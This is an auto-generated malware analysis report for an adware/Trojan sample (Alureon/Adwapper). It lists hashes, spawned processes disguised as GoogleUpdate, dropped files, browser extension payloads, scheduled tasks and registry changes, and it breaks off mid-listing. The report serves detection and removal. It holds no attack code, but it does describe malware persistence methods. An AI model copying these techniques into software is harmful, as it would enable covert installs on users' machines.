Trojan.Win32.Alureon_33f4c0b6bc

by malwarelabrobot on February 26th, 2016 in Malware Descriptions.

not-a-virus:AdWare.NSIS.Adwapper.cd (Kaspersky), Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 33f4c0b6bc10c582d33ea7f8431b8c85
SHA1: 59d908a83367fb69ee4853ff33c83333deca5bb6
SHA256: cbc1dbbc5607c23186b73e5cb13b979ab668d403308b48fd9bf8342860958a37
SSDeep: 196608:q3t6ahuiKVf6FkqPgGczMsCAsRG7jEik/Ce3e4sP/fbSUTcRyQvCrvH:q3tBwiofwVYGodjFIBDUTcPq7H
Size: 11336880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

GoogleUpdate.exe:1300
GoogleUpdate.exe:1220
GoogleUpdate.exe:1272
GoogleUpdate.exe:3944
GoogleUpdate.exe:476
GoogleUpdate.exe:2032
GoogleUpdate.exe:1936
17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600
f56fe68c-ded6-4656-a272-5100e7b20016.exe:356
17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676
17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936
winservice86-bg.exe:2952
winservice86-codedownloader.exe:2888
winservice86-codedownloader.exe:2796
regsvr32.exe:2472
%original file name%.exe:1332
0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process GoogleUpdate.exe:1272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (930 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (49 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIcdd94.LOG (474 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (0 bytes)

The process GoogleUpdate.exe:2032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (7547 bytes)

The Trojan deletes the following file(s):

%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{802A0BF3-D6B3-4F6C-B8D7-B6C3243887F5}-setup.exe (0 bytes)
%Program Files%\globalUpdate\Update\Install (0 bytes)

The process f56fe68c-ded6-4656-a272-5100e7b20016.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 (113 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70 (75 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70 (232 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404 (228 bytes)

The process winservice86-codedownloader.exe:2888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[2].xml (25 bytes)

The process %original file name%.exe:1332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdate.dll (5441 bytes)
%Program Files%\winservice86\b0eae4e3-6b8d-4874-83f1-2ee3fd4e727b.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (45051 bytes)
%Program Files%\winservice86\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\winservice86\winservice86-bho.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (1358266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (825 bytes)
%Program Files%\winservice86\Newtonsoft.Json.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\200[1].js (887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2.tmp (605555 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Common.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\424[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\plugins[1].json (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\220[1].js (19969 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.xpi (1425 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Protocol.dll (19 bytes)
%Program Files%\winservice86\winservice86-codedownloader.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (4 bytes)
%Program Files%\winservice86\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\winservice86\winservice86.ico (9 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\288[1].js (963 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\winservice86\winservice86-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll (1281 bytes)
%WinDir%\Tasks\f56fe68c-ded6-4656-a272-5100e7b20016.job (1620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (1 bytes)
%Program Files%\winservice86\WebSocket4Net.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\91[1].js (88337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\345[1].js (781 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-1.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\winservice86\Interop.IWshRuntimeLibrary.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (34023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (1066 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdateres_en.dll (26 bytes)
%Program Files%\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\380[1].js (25 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (5 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-2.job (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (1 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe (5873 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (1 bytes)
%Program Files%\winservice86\utils.exe (76825 bytes)
%WinDir%\Tasks\0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (70 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe (601 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (359414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (3 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\339[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\311[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (43318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (4 bytes)
%Program Files%\winservice86\Uninstall.exe (601 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Core.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (410 bytes)
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (0 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (0 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (0 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (0 bytes)

Registry activity

The process GoogleUpdate.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 30 68 94 0B 1C F4 87 36 47 06 A6 66 63 A0 D0"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:1220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
